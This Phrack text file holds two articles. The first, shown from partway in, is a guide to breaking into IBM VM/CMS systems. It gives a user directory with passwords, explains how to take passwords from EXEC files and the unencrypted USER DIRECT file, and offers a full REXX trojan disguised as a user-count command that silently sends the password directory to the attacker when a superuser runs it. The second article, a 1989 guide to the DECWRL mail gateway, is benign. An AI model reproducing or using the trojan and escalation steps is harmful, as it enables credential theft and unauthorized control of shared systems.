 MDISK 101 3380 026 007 VMPK02 MR RVMARCH  WVMARCH  MVMARCH            03131808
 MDISK 200 3380 033 007 VMPK02 MR RVMARCH  WVMARCH  MVMARCH            03131808
*
USER VMBACKUP VMBACKUP 2M 16M BEG 64 ON ON ON ON
*
* 5664291 VMBACKUP
*
 ACCOUNT 999
 OPTION ACCT BMX ECMODE
 IPL CMS
 CONSOLE 009 3215
 SPOOL 001 2540 READER *
 SPOOL 00C 2540 READER *
 SPOOL 00D 2540 PUNCH
 SPOOL 0D0 2540 PUNCH
 SPOOL 0D1 2540 PUNCH
 SPOOL 00E 1403
 SPOOL 0E0 1403
 SPOOL 0E1 1403
 SPOOL 0E2 1403
 SPOOL 0E3 1403
 SPOOL 0E4 1403
 SPOOL 0E5 1403
 SPOOL 0E6 1403
 SPOOL 0E7 1403
 LINK MAINT 190 190 RR
 LINK MAINT 19E 19E RR
 LINK MAINT 123 1A0 RR
 MDISK 191 3380 040 006 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU           03131808
 MDISK 192 3380 046 003 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU           03131808
 MDISK 193 3380 049 003 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU           03131808
 MDISK 194 3380 052 044 VMPK02 MR RVMBACKU WVMBACKU MVMBACKU           03131808
*
USER VMBSYSAD VMBSYSAD 1M 4M BG 64 ON ON ON ON
*
* 5664291 VMBACKUP
*
INCLUDE EXPPROF
 ACCOUNT 999
 LINK MAINT 191 124 RR
 LINK VMBACKUP 194 294 RR RVMBACKU
 LINK VMBACKUP 193 293 RR RVMBACKU
 LINK MAINT 123 1A0 RR
 MDISK 191 3380 096 005 VMPK02 MR RVMBSYSA WVMBSYSA MVMBSYSA           03131808
 MDISK 192 3380 101 009 VMPK02 MR RVMBSYSA WVMBSYSA MVMBSYSA           03131808
*
USER DEMO1 DEMO1 4M 4M G 64 ON ON ON ON
*
* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
*
INCLUDE EXPPROF
 ACCOUNT DEMO1 DEMO1
 IUCV SQLDBA
 LINK MAINT    319 319 RR
 LINK MAINT    31A 31A RR
 LINK MAINT    322 322 RR
 LINK MAINT    326 326 RR
 LINK MAINT    34A 59A RR
 LINK SQLDBA   195 195 RR
 LINK SYSADMIN 399 399 RR
 MDISK 191 3380 107 003 VMSRES MR RDEMO1   WDEMO1   MDEMO1             03131808
*
USER DEMO2 DEMO2 4M 4M G 64 ON ON ON ON
*
* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
*
INCLUDE EXPPROF
 ACCOUNT DEMO2 DEMO2
 IUCV SQLDBA
 LINK MAINT    319 319 RR
 LINK MAINT    31A 31A RR
 LINK MAINT    322 322 RR
 LINK MAINT    326 326 RR
 LINK MAINT    34A 59A RR
 LINK SQLDBA   195 195 RR
 LINK SYSADMIN 399 399 RR
 MDISK 191 3380 859 003 VMSRES MR RDEMO2   WDEMO2   MDEMO2             03131808
*
USER DEMO3 DEMO3 4M 4M G 64 ON ON ON ON
*
* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
*
INCLUDE EXPPROF
 ACCOUNT DEMO3 DEMO3
 IUCV SQLDBA
 LINK MAINT    319 319 RR
 LINK MAINT    31A 31A RR
 LINK MAINT    322 322 RR
 LINK MAINT    326 326 RR
 LINK MAINT    34A 59A RR
 LINK SQLDBA   195 195 RR
 LINK SYSADMIN 399 399 RR
 MDISK 191 3380 862 003 VMSRES MR RDEMO3   WDEMO3   MDEMO3             03131808
*
USER DEMO4 DEMO4 4M 4M G 64 ON ON ON ON
*
* 5664283 VM/IS-PRODUCTIVITY FACILITY SAMPLE USER
*
INCLUDE EXPPROF
 ACCOUNT DEMO4 DEMO4
 IUCV SQLDBA
 LINK MAINT    319 319 RR
 LINK MAINT    31A 31A RR
 LINK MAINT    322 322 RR
 LINK MAINT    326 326 RR
 LINK MAINT    34A 59A RR
 LINK SQLDBA   195 195 RR
 LINK SYSADMIN 399 399 RR
 MDISK 191 3380 865 003 VMSRES MR RDEMO4   WDEMO4   MDEMO4             03131808
*
USER VMTAPE VMTAPE 1M 2M BCEG 64 ON ON ON ON
*
* 5664292 VMTAPE
*
INCLUDE EXPPROF
 ACCOUNT 999
 OPTION BMX ECMODE ACCT
 MDISK 191 3380 110 005 VMPK02 MR RVMTAPE  WVMTAPE  MVMTAPE            03131808
 MDISK 200 3380 115 007 VMPK02 MR RVMTAPE  WVMTAPE  MVMTAPE            03131808
 MDISK 300 3380 122 007 VMPK02 MR RVMTAPE  WVMTAPE  MVMTAPE            03131808
*
USER VMTLIBR VMTLIBR 1M 3M G 64 ON ON ON ON
*
* 5664292 VMTAPE
*
INCLUDE EXPPROF
 ACCOUNT 999
 LINK VMTAPE 191 193 MR
 LINK VMTAPE 200 200 MW
 LINK VMTAPE 300 300 MW
 MDISK 191 3380 129 005 VMPK02 MR RVMTLIBR WVMTLIBR MVMTLIBR           03131808
 MDISK 192 3380 134 007 VMPK02 MR RVMTLIBR WVMTLIBR MVMTLIBR           03131808
*
USER VMMAP VMMAP 2M 4M G 64 ON ON ON ON
*
* 5664191 VMMAP
*
INCLUDE EXPPROF
 ACCOUNT 999
 LINK MAINT 193 193 RR
 MDISK 191 3380 639 024 VMSRES MR RVMMAP   WVMMAP   MVMMAP             03131808
*
USER VTAM VTAM 5M 16M G 64 ON ON ON ON
*
* 5664280 VTAM
*
 ACCOUNT VTAM GCS
 OPTION ECMODE DIAG98 MAXCONN 400
 IUCV *CCS P M 10
 IUCV ANY P M 0
 IPL GCS PARM AUTOLOG
 CONSOLE 01F 3215
 SPOOL 00C 2540 READER A
 SPOOL 00D 2540 PUNCH A
 SPOOL 00E 1403 A
 LINK MAINT 190 190 RR
 LINK MAINT 298 191 RR
 LINK MAINT 29A 29A RR
 LINK MAINT 595 595 RR
*
USER VM3812 VM3812 3M 4M BG 64 ON ON ON ON
*
* 5798DTE VM3812 SERVICE MACHINE
*
INCLUDE EXPPROF
 ACCOUNT 15 SYSTEM
 MDISK 191 3380 813 004 VMPK01 MR RVM3812  WVM3812  MVM3812            03131808
 MDISK 192 3380 817 007 VMPK01 MR RVM3812  WVM3812  MVM3812            03131808
 MDISK 193 3380 824 020 VMPK01 MR ALL      WVM3812                     03131808
*    ADD USER ID ------
USER VSEMAN VSE 2M 16M ABCDEFG 42 ON ON ON ON
INCLUDE EXPPROF
 ACCOUNT 999 SYSTEM
 MDISK 191 3380 001 030 EDMD01 MR VSE                                  03131808
 MDISK 192 3380 873 012 VMSRES MR VSE                                  03131808
USER PENG PENG  2M 16M ABCDEFG 42 ON ON ON ON
INCLUDE EXPPROF
 ACCOUNT 999 SYSTEM
 MDISK 191 3380 553 010 VMSRES MR PENG PENG                            03131808
*
USER MOESERV MOESERV  2M 16M G 42 ON ON ON ON
INCLUDE EXPPROF
 ACCOUNT 996 MOE
 MDISK 191 3380 544 002 VMPK01 MR MOESERV MOESERV                      03131808
*
USER VTAMUSER CCC      2M 8M G 64 ON ON ON ON
*
* 5668814 CSP
*
 INCLUDE EXPPROF
 ACCOUNT 101
 MDISK 191 3380 134 032 VMPK01 MW VTAM1  WVTAM1   MVTAM1               03131808
USER IDMSSE IDMS     2M 8M G 64 ON ON ON ON
 INCLUDE EXPPROF
 ACCOUNT 101
 MDISK 191 3380 519 005 VMPK01 MW VTAM1  WVTAM1   MVTAM1               03131808
 MDISK 192 3380 524 020 VMPK01 MW VTAM1  WVTAM1   MVTAM1               03131808

===============================================================================

If you need an explanation about these two tables, you should look at it like
this:

       |------User ID
       |     |-------That User ID's password
       ^     ^
USER IDMSSE IDMS     2M 8M G 64 ON ON ON ON
                     ^  ^  ^
                     |  |  |---Its privilege grade
                     |  |--Its maximum memory storage
                     |
                     |----Its default memory storage

 INCLUDE EXPPROF  <-----What you see when you log on
 ACCOUNT 101
 MDISK 191 3380 519 005 VMPK01 MW VTAM1  WVTAM1   MVTAM1
        ^                          ^       ^      ^
        |                          |       |      |---Minidisk mult pass
        |                          |       |---Minidisk write pass
        |                          |---Minidisk read pass
        |--Its minidisk

 MDISK 192 3380 524 020 VMPK01 MW VTAM1  WVTAM1   MVTAM1

===============================================================================

Luckily, I have tested the second table in 4 VM systems and it works.  May you
be lucky too!

Of course, since all of us are general users, the first thing to know is how to
get privileges by trying a password or by accident by getting privileged users'
passwords.

While CP/CMS uses passwords to control performance, it must store some
passwords in the REXX command language (EXEC files).  It looks like this:

CP LINK VTAMUSER 191 121 RR VTAM1

If you have succeeded in linking that minidisk then:

AC 121 B
FILEL * * B

Then you can see all of the files owned by VTAMUSER.  Usually people are lazy
enough to remember too many passwords, so to read the passwords.  It may be its
CP pass too!  TRY IT!!!

But IBM is not so stupid as to let any user with privileges open accounts
randomly.  It limits a maximum of 8 superusers to be able to do it.  You may
find it in:

DIRMAINT DATA Y2

Only these DIRM-STAFF can open accounts from the console.  If another user logs
on from a terminal, he will be logged out immediately even though he knew the
password. And only these STAFF have 2 modes of operation to use:

DIRM

One is general user mode and the other is operation mode (Privilege operation)
so you have to cheat the O.S. to think that you are NOT logged in from a
terminal.  Our way is to use TELNET.  Usually this package is named TCPIP.  Do
this:

TELNET yourhost

It will request you logon again.  Then, if you logon with the superuser ID &
password, the O.S. will not recognize that you are from a terminal and will let
you in!!  The most important thing is that IBM stores its user IDs & passwords
in a file:

USER DIRECT

Usually, this file is stored on DIRMAINT's minidisk and it is a text file!!!  I
do not know why, but it actually is not encrypted!!!!  Incredible to believe...

Once you have this file, you will know all users' passwords and all information
about all users' IDs and I think it is rude to open new accounts!  Poor me!
I've done this and lost privs 3 times now.  While there is a way to get back
your privs, first you need find a privileged ID so that you can write your file
in it.  Then, write a EXEC file into it.  This file's name must be a most
common command that any one will issue.  If the general user uses it, nothing
happens, but if a superuser issues it, then it will do something for you!  Here
is a example:

Please note that wherever you see (cut), it means that the line was too long
and had to be split.  Whenever you see (cut), take the line below the line that
it is on and paste it on the end of the (cut) line (removing the (cut) in the
process).

-----------------------------------Cut Here------------------------------------
/* DISPLAY THE NUMBER OF SPECIFIED USERS LOGGED ON */
TRACE O
USER  = 0
SW    = 1
S     = 1
PARSE UPPER ARG NAM GARBAGE
IF NAM = ' ' THEN signal qname
PO = INDEX(NAM,'*')
IF PO = 0 THEN DO
   Q NAM
   EXIT
  END
T = PO - 1
IF T= 0 THEN signal qname
NALL = SUBSTR(NAM,1,T)
EXECIO '* CP (STRING Q N '
NUMQ  = QUEUED()
DO N  = 1 TO NUMQ
   PULL STR
PARSE VALUE STR with  NA.N '-' LA.N ',' NB.N '-' LB.N ',' NC.N '-' LC.N (cut)
    ','ND.N '-' LD.N
na.n=substr(strip(na.n,'L'),1,8)
nb.n=substr(strip(nb.n,'L'),1,8)
nc.n=substr(strip(nc.n,'L'),1,8)
nd.n=substr(strip(nd.n,'L'),1,8)
END
DO N  = 1 TO NUMQ
   IF LA.N ^= DSC & LA.N ^= ' ' & SUBSTR(NA.N,1,T)=NALL & (cut)
         SUBSTR(space(NA.N),1,4)^='LOGO' & SPACE
      A.S = NA.N||'-'||LA.N||',' ; S=S+1 ; USER=USER+1; END;
   IF LB.N ^= DSC & LB.N ^= ' ' & SUBSTR(NB.N,1,T)=NALL & (cut)
         SUBSTR(space(NB.N),1,4)^='LOGO' & SPACE
      A.S = NB.N||'-'||LB.N||',' ; S=S+1 ; USER=USER+1; END;
   IF LC.N ^= DSC & LC.N ^= ' ' & SUBSTR(NC.N,1,T)=NALL & (cut)
         SUBSTR(space(NC.N),1,4)^='LOGO' & SPACE
      A.S = NC.N||'-'||LC.N||',' ; S=S+1 ; USER=USER+1; END;
   IF LD.N ^= DSC & LD.N ^= ' ' & SUBSTR(ND.N,1,T)=NALL & (cut)
         SUBSTR(space(ND.N),1,4)^='LOGO' SPACE(L
      A.S = ND.N||'-'||LD.N||',' ; S=S+1 ; USER=USER+1; END;
END
CLRSCRN
call concate
SAY
MM= ' <- - - - - - - - - - - -' RIGHT(USER,3,0) ' SPECIFIED LOGON USERS - (cut)
         - - - - - - - - - - ->'
say MM
SAY
SAY
EXIT
QNAME:
/* DISPLAY THE NUMBER OF USERS LOGGED ON */
USER  = 0
SW    = 1
S     = 1
EXECIO '* CP (STRING Q N '
IF USERID() ='MAINT' THEN SIGNAL NJ  /*super user id */
IF USERID() ='JASMIN' THEN SIGNAL NJ /*super user id */
IF USERID() ='LIU' THEN SIGNAL NJ    /*supr userid */
IF USERID() ='PMAINT' THEN SIGNAL NJ /*super user id*/
IF USERID() ='MOESERV' THEN SIGNAL NJ /* super user id*/
SIGNAL JP
NJ:
CP SET IMSG OFF
CP SET MSG OFF
EXEC DIRMAINT GET DIRMAINT NOLOCK
SLEEP 2  SEC
CP TRAN     USERID() ALL yourid   /* to your own id*/
CP SET IMSG ON
CP SET MSG ON
JP:
NUMQ  = QUEUED()
DO N  = 1 TO NUMQ
   PULL STR
         PARSE VALUE STR with  NA.N '-' LA.N ',' NB.N '-' LB.N ',' NC.N (cut)
         '-' LC.N ','ND.N '-' LD.N
na.n=substr(strip(na.n,'L'),1,8)
nb.n=substr(strip(nb.n,'L'),1,8)
nc.n=substr(strip(nc.n,'L'),1,8)
nd.n=substr(strip(nd.n,'L'),1,8)
END
DO N  = 1 TO NUMQ
   IF LA.N ='VTAM' THEN SELECT
      WHEN (S+0)//4 = 1 THEN DO
      LA.N ='VTAM' THEN DO
      A.S ='VSM - VTAM'       ; S = S+1 ;
      A.S=' ' ; S=S+1 ; A.S=' ' ; S=S+1 ; A.S =' ' ; S=S+1 ; ITERATE
   END
      WHEN (S+0)//4 = 2 THEN DO
      A.S = ' ' ; S = S+1 ; A.S = ' '   ;S=S+1 ; A.S =' ' ; S=S+1 ;END
      WHEN (S+0)//4 = 3 THEN DO;A.S =' ';S=S+1 ; A.S =' ' ; S=S+1 ;END;
      WHEN (S+0)//4 = 0 THEN DO; A.S = ' ' ; S=S+1 ; END
   END
   IF LA.N ='VTAM' THEN DO
      A.S ='VSM - VTAM'       ; S = S+1 ;
      A.S=' ' ; S=S+1 ; A.S=' ' ; S=S+1 ; A.S =' ' ; S=S+1 ; ITERATE
   END
   IF LA.N ^= DSC & LA.N ^= ' ' & SUBSTR(space(NA.N),1,4)^='LOGO' & (cut)
         SPACE(LA.N)^=SPACE(NA.N) THEN
      A.S = NA.N||'-'||LA.N||',' ; S=S+1 ; USER=USER+1; END;
   IF LB.N ^= DSC & LB.N ^= ' ' & SUBSTR(space(NB.N),1,4)^='LOGO' & (cut)
         SPACE(LB.N)^=SPACE(NB.N) THEN
      A.S = NB.N||'-'||LB.N||',' ; S=S+1 ; USER=USER+1; END;
   IF LC.N ^= DSC & LC.N ^= ' ' & SUBSTR(space(NC.N),1,4)^='LOGO' & (cut)
         SPACE(LC.N)^=SPACE(NC.N) THEN
      A.S = NC.N||'-'||LC.N||',' ; S=S+1 ; USER=USER+1; END;
   IF LD.N ^= DSC & LD.N ^= ' ' & SUBSTR(space(ND.N),1,4)^='LOGO' & (cut)
SPACE(LD.N)^=SPACE(ND.N) THEN
      A.S = ND.N||'-'||LD.N||',' ; S=S+1 ; USER=USER+1; END;
END
CLRSCRN
call concate
SAY
MM= ' <- - - - - - - - - - - - - ' RIGHT(USER,3,0) ' LOGON  USERS - - - - (cut)
         - - - - - - - - - - ->'
say  MM
SAY
exit
concate:
DO I = 1 TO S-1 BY 4
   IF I+1 < S   THEN   P=I+1   ;      ELSE A.P = ' '
   IF I+2 < S   THEN   Q=I+2   ;      ELSE A.Q = ' '
   IF I+3 < S   THEN   R=I+3   ;      ELSE A.R = ' '
   STR= ' '
   IF I+3 < S   THEN   R=I+3   ;      ELSE A.R = ' '
   STR=INSERT(A.I,STR,1)       ;      STR=INSERT(A.P,STR,21)
   STR=INSERT(A.Q,STR,41)      ;      STR=INSERT(A.R,STR,61)
   SAY STR
END
return
-----------------------------------Cut Here------------------------------------

Well, that is it...Unfortunately, we did not know how to install a backdoor in
IBM VM/CMS so we could not keep privs permanently.  It is a pity...but we're
glad to share our experience with hackers!

                               Sincerely,

                                            Goe
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 30, File #5 of 12

                    ()()()()()()()()()()()()()()()()()()()
                    ()                                  ()
                    ()      The DECWRL Mail Gateway     ()
                    ()                                  ()
                    ()         by Dedicated Link        ()
                    ()                                  ()
                    ()        September 20, 1989        ()
                    ()                                  ()
                    ()()()()()()()()()()()()()()()()()()()


INTRODUCTION

DECWRL is a mail gateway computer operated by Digital's Western Research
Laboratory in Palo Alto, California.  Its purpose is to support the interchange
of electronic mail between Digital and the "outside world."

DECWRL is connected to Digital's Easynet, and also to a number of different
outside electronic mail networks.  Digital users can send outside mail by
sending to DECWRL::"outside-address", and digital users can also receive mail
by having your correspondents route it through DECWRL.  The details of incoming
mail are more complex, and are discussed below.

It is vitally important that Digital employees be good citizens of the networks
to which we are connected.  They depend on the integrity of our user community
to ensure that tighter controls over the use of the gateway are not required.
The most important rule is "no chain letters," but there are other rules
depending on whether the connected network that you are using is commercial or
non-commercial.

The current traffic volume (September 1989) is about 10,000 mail messages per
day and about 3,000 USENET messages per day.  Gatewayed mail traffic has
doubled every year since 1983.  DECWRL is currently a Vax 8530 computer with 48
megabytes of main memory, 2500 megabytes of disk space, 8 9600-baud (Telebit)
modem ports, and various network connections.  They will shortly be upgrading
to a Vax 8650 system.  They run Ultrix 3.0 as the base operating system.


ADMINISTRATION

The gateway has engineering staff, but no administrative or clerical staff.
They work hard to keep it running, but they do not have the resources to answer
telephone queries or provide tutorials in its use.

They post periodic status reports to the USENET newsgroup dec.general.  Various
helpful people usually copy these reports to the VAXNOTES "gateways" conference
within a day or two.


HOW TO SEND MAIL

DECWRL is connected to quite a number of different mail networks.  If you were
logged on directly to it, you could type addresses directly, e.g.

    To: strange!foreign!address.

But since you are not logged on directly to the gateway, you must send mail so
that when it arrives at the gateway, it will be sent as if that address had
been typed locally.


* Sending from VMS

If you are a VMS user, you should use NMAIL, because VMS mail does not know how
to requeue and retry mail when the network is congested or disconnected.  From
VMS, address your mail like this:

    To: nm%DECWRL::"strange!foreign!address"

The quote characters (") are important, to make sure that VMS doesn't try to
interpret strange!foreign!address itself.  If you are typing such an address
inside a mail program, it will work as advertised.  If you are using DCL and
typing directly to the command line, you should beware that DCL likes to remove
quotes, so you will have to enclose the entire address in quotes, and then put
two quotes in every place that one quote should appear in the address:

    $ mail test.msg "nm%DECWRL::""foreign!addr""" /subj="hello"

Note the three quotes in a row after foreign!addr.  The first two of them are
doubled to produce a single quote in the address, and the third ends the
address itself (balancing the quote in front of the nm%).

Here are some typical outgoing mail addresses as used from a VMS system:

    To: nm%DECWRL::"lll-winkin!netsys!phrack"
    To: nm%DECWRL::"[email protected]"
    To: nm%DECWRL::"[email protected]"
    To: nm%DECWRL::"[email protected]"
    To: nm%DECWRL::"[email protected]"


* Sending from Ultrix

If your Ultrix system has been configured for it, then you can, from your
Ultrix system, just send directly to the foreign address, and the mail software
will take care of all of the gateway routing for you.  Most Ultrix systems in
Corporate Research and in the Palo Alto cluster are configured this way.

To find out whether your Ultrix system has been so configured, just try it and
see what happens.  If it doesn't work, you will receive notification almost
instantly.

    NOTE:  The Ultrix mail system is extremely flexible; it is almost
    completely configurable by the customer.  While this is valuable to
    customers, it makes it very difficult to write global instructions for
    the use of Ultrix mailers, because it is possible that the local changes
    have produced something quite unlike the vendor-delivered mailer.  One of
    the popular changes is to tinker with the meaning of quote characters (")
    in Ultrix addresses.  Some systems consider that these two addresses are
    the same:

        [email protected]

    and

        "site1!site2!user"@host.dec.com

    while others are configured so that one form will work and the other
    will not.  All of these examples use the quotes.  If you have trouble
    getting the examples to work, please try them again without the quotes.
    Perhaps your Ultrix system is interpreting the quotes differently.

If your Ultrix system has an IP link to Palo Alto (type "/etc/ping
decwrl.dec.com" to find out if it does), then you can route your mail to the
gateway via IP.  This has the advantage that your Ultrix mail headers will
reach the gateway directly, instead of being translated into DECNET mail
headers and then back into Ultrix at the other end.  Do this as follows:

    To: "alien!address"@decwrl.dec.com

The quotes are necessary only if the alien address contains a ! character, but
they don't hurt if you use them unnecessarily.  If the alien address contains
an "@" character, you will need to change it into a "%" character.  For
example, to send via IP to [email protected], you should address the mail

    To: "joe%widget.org"@decwrl.dec.com

If your Ultrix system has only a DECNET link to Palo Alto, then you should
address mail in much the same way that VMS users do, save that you should not
put the nm% in front of the address:

    To: DECWRL::"strange!foreign!address"

Here are some typical outgoing mail addresses as used from an Ultrix system
that has IP access.  Ultrix systems without IP access should use the same
syntax as VMS users, except that the nm% at the front of the address should not
be used.

    To: "lll-winken!netsys!phrack"@decwrl.dec.com
    To: "postmaster%msp.pnet.sc.edu"@decwrl.dec.com
    To: "phrackserv%CUNYVM.bitnet"@decwrl.dec.com
    To: "netsys!phrack%uunet.uu.net"@decwrl.dec.com
    To: "[email protected]"@decwrl.dec.com


DETAILS OF USING OTHER NETWORKS

All of the world's computer networks are connected together, more or less, so
it is hard to draw exact boundaries between them.  Precisely where the Internet
ends and UUCP begins is a matter of interpretation.

For purposes of sending mail, though, it is convenient to divide the network
universe into these categories:

Easynet         Digital's internal DECNET network.  Characterized by addresses
                of the form NODE::USER.  Easynet can be used for commercial
                purposes.

Internet        A collection of networks including the old ARPAnet, the NSFnet,
                the CSnet, and others.  Most international research,
                development, and educational organizations are connected in
                some fashion to the Internet.  Characterized by addresses of
                the form [email protected].  The Internet itself
                cannot be used for commercial purposes.

UUCP            A very primitive network with no management, built with
                auto-dialers phoning one computer from another.  Characterized
                by addresses of the form place1!place2!user.  The UUCP network
                can be used for commercial purposes provided that none of the
                sites through which the message is routed objects to that.

USENET          Not a network at all, but a layer of software built on top of
                UUCP and Internet.

BITNET          An IBM-based network linking primarily educational sites.
                Digital users can send to BITNET as if it were part of
                Internet, but BITNET users need special instructions for
                reversing the process.  BITNET cannot be used for commercial
                purposes.

Fidonet         A network of personal computers.  I am unsure of the status of
                using Fidonet for commercial purposes, nor am I sure of its
                efficacy.


DOMAINS AND DOMAIN ADDRESSING

There is a particular network called "the Internet;" it is somewhat related to
what used to be "the ARPAnet."  The Internet style of addressing is flexible
enough that people use it for addressing other networks as well, with the
result that it is quite difficult to look at an address and tell just what
network it is likely to traverse.  But the phrase "Internet address" does not
mean "mail address of some computer on the Internet" but rather "mail address
in the style used by the Internet."  Terminology is even further confused
because the word "address" means one thing to people who build networks and
something entirely different to people who use them.  In this file an "address"
is something like "[email protected]" and not "192.1.24.177" (which is what
network engineers would call an "internet address").

The Internet naming scheme uses hierarchical domains, which despite their title
are just a bookkeeping trick.  It doesn't really matter whether you say
NODE::USER or USER@NODE, but what happens when you connect two companies'
networks together and they both have a node ANCHOR??  You must, somehow,
specify which ANCHOR you mean.  You could say ANCHOR.DEC::USER or
DEC.ANCHOR::USER or [email protected] or [email protected].  The Internet
convention is to say [email protected], with the owner (DEC) after the name
(ANCHOR).

But there could be several different organizations named DEC.  You could have
Digital Equipment Corporation or Down East College or Disabled Education
Committee.  The technique that the Internet scheme uses to resolve conflicts
like this is to have hierarchical domains.  A normal domain isn't DEC or
STANFORD, but DEC.COM (commercial) and STANFORD.EDU (educational).  These
domains can be further divided into ZK3.DEC.COM or CS.STANFORD.EDU.  This
doesn't resolve conflicts completely, though:  both Central Michigan University
and Carnegie-Mellon University could claim to be CMU.EDU.  The rule is that the
owner of the EDU domain gets to decide, just as the owner of the CMU.EDU gets
to decide whether the Electrical Engineering department or the Elementary
Education department gets subdomain EE.CMU.EDU.

The domain scheme, while not perfect, is completely extensible.  If you have
two addresses that can potentially conflict, you can suffix some domain to the
end of them, thereby making, say, decwrl.UUCP be somehow different from
DECWRL.ENET.

DECWRL's entire mail system is organized according to Internet domains, and in
fact we handle all mail internally as if it were Internet mail.  Incoming mail
is converted into Internet mail, and then routed to the appropriate domain; if
that domain requires some conversion, then the mail is converted to the
requirements of the outbound domain as it passes through the gateway.  For
example, they put Easynet mail into the domain ENET.DEC.COM, and they put
BITNET mail into the domain BITNET.

The "top-level" domains supported by the DECWRL gateway are these:

  .EDU        Educational institutions
  .COM        Commercial institutions
  .GOV        Government institutions
  .MIL        Military institutions
  .ORG        Various organizations
  .NET        Network operations
  .BITNET     The BITNET
  .MAILNET    The MAILNET
  .??         2-character country code for routing to other countries
  .OZ         Part of the Australian (.AU) name space.

2-character country codes include UK (United Kingdom), FR (France), IT (Italy),
CA (Canada), AU (Australia), etc.  These are the standard ISO 2-character
country codes.


MAILING TO EASYNET

To mail to user SPRINTER at node WASH (which is DECNET address WASH::SPRINTER),
Internet mail should be addressed to [email protected].  Easynet
addresses are not case-dependent; WASH and wash are the same node name and
SPRINTER and sprinter are the same user name.

Sites that are not directly connected to the Internet may have difficulty with
Internet addresses like wash.enet.dec.com.  They can send into the Easynet by
explicitly routing the mail through DECWRL.  From domain-based Internet
mailers, the address would be sprinter%[email protected].  From UUCP
mailers, the address would be decwrl!wash.enet!sprinter. Some Internet mailers
require the form <@decwrl.dec.com:[email protected]>.  (This last form is the
only technically correct form of explicit route, but very few Internet sites
support it.)

The DECWRL gateway also supports various obsolete forms of addressing that are
left over from the past.  In general they support obsolete address forms for
two years after the change, and then remove it.


MAILING TO DIGITAL ALL-IN-1 USERS

Some Easynet users do not have a direct DECNET node address, but instead read
their mail with All-in-1, which uses addresses of the form "Nate State @UCA".
Here "UCA" is a Digital location code name.  To route mail to such people, send
to [email protected].  Mail received from the All-in-1 mailer is
unreplyable, and in fact unless the respondent tells you his return address in
the body of the message, it is not normally possible even to puzzle out the
return address by studying the message header.  Mail from All-in-1 to Easynet
passes through a gateway program that does not produce valid return addresses.


MAILING TO THE INTERNET

DECWRL's mailer is an Internet mailer, so to mail to an Internet site, just use
its address.  If you are having trouble determining the Internet address, you
might find that the Ultrix host table /etc/hosts.txt is useful.  If you can't
find one anywhere else, there's one on DECWRL.  See the comments above under
"how to send mail" for details about making sure that the mail program you are
using has correctly interpreted an address.


MAILING TO UUCP

UUCP mail is manually routed by the sender, using ! as the separator character.
Thus, the address xxx!yyy!zzz!user means to dial machine xxx and relay to it
the mail, with the destination address set to yyy!zzz!user.  That machine in
turn dials yyy, and the process repeats itself.

To correctly address UUCP mail, you must know a working path through the UUCP
network.  The database is sufficiently chaotic that automatic routing does not
work reliably (though many sites perform automatic routing anyhow).  The
information about UUCP connectivity is distributed in the USENET newsgroup
comp.mail.maps; many sites collect this data and permit local queries of it.

At the end of this file is a list of the UUCP nodes to which DECWRL currently
has a working connection.


MAILING TO USENET

Usenet is not a network.  It's a software layer, and it spans several networks.
Many people say "Usenet" when they really mean UUCP.  You can post a message to
a Usenet newsgroup by mailing it to "name@usenet" at DECWRL.  For example,
mailing from VMS to this address:

    nm%DECWRL::"alt.cyberpunk@usenet"

causes the mail message to be posted as an article to the Usenet newsgroup
alt.cyberpunk.  It is better to use Usenet software for posting articles, as
more features are available that way, such as restricted distributions,
crossposting, and cancellation of "wish I hadn't sent that" articles.


MAILING TO BITNET

Legend has it that the "BIT" in BITNET stands for "Because It's There" or
"Because It's Time."  It is a network consisting primarily of IBM computers.  A
native BITNET address is something like "OMAR at STANFORD", but when translated
into our Internet format it becomes [email protected].  Once translated into
Internet form, a BITNET address is used just like any other Internet address.


MAILING TO FIDONET

By comparison with the other linked networks, Fidonet has an addressing
complexity bordering on the bizarre.  The Fidonet people have provided me with
this description:

Each Fidonet node is a member of a "network," and may have subsidiary nodes
called "point nodes."  A typical Fido address is "1:987/654" or "987/654"; a
typical Fido "point node" address is "1:987/654.32" or "987/654.32".  This is
zone 1, network 987, Fido (node) 654, "point node" 32.  If the zone number is
missing, assume it is zone 1.  The zone number must be supplied in the outgoing
message.

To send a message to Chris Jones on Fidonet address 1:987/654, use the address
[email protected].  To send a message to Mark Smith at
Fidonet node 987/654.32, use address [email protected].
Use them just like any other Internet address.

Sometimes the return addresses on messages from Fidonet will look different.
You may or may not be able to reply to them.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Appendix:  List of UUCP Neighbor Sites

This table shows most of the sites that DECWRL dials directly via UUCP.  You
may find it useful to help you construct a UUCP route to a particular
destination.  Those sites marked with "*" are major UUCP routing nodes.  You
should prefer UUCP routes that use these sites as the first hop from DECWRL.
Case is significant in UUCP host names.

      3comvax    3Com Corporation, Santa Clara, CA
      abvax      Allen-Bradley Company, Highland Heights, OH
      acad       Autodesk, Inc, Sausalito, CA
      adobe      Adobe Systems Inc., Mountain View, CA
      alberta    University of Alberta, Edmonton, Alberta, Canada
      allegra    AT&T Bell Laboratories, Murray Hill, NJ
     *amdahl     Amdahl Corp., Sunnyvale, CA
      amdcad     Advanced Micro Devices, Sunnyvale, CA
      ames       NASA Ames Research Center, Mountain View, CA
     *apple      Apple Computers, Cupertino, CA
      ardent     Ardent Computer Corp., Sunnyvale, CA
      argosy     MassPar Computer Corp., Sunnyvale, CA
      atha       Athabasca University, Athabasca, Alberta, Canada
      athertn    Atherton Technology, Sunnyvale, CA
     *att        AT&T Bell Laboratories, Columbus, Ohio
      avsd       Ampex Corporation, Redwood City, CA
      cae780     Tektronix Inc. (Santa Clara Field Office) Santa Clara, CA
      chip       M/A-COM Government Systems, San Diego, CA
      claris     Claris Corporation, Mountain View, CA
      daisy      Daisy Systems, Mountain View, CA
      decuac     DEC/Ultrix Applications Ctr, Landover, MD
     *decvax     DEC/Ultrix Engineering, Nashua, NH
      dsinc      Datacomp Systems, Inc, Huntington Valley, PA
      eda        EDA Systems Inc., Santa Clara, CA
      emerald    Emerald Systems Corp., San Diego, CA
      escd       Evans and Sutherland Computer Division, Mountain View, CA
      esunix     Evans and Sutherland Corp., Salt Lake City, UT
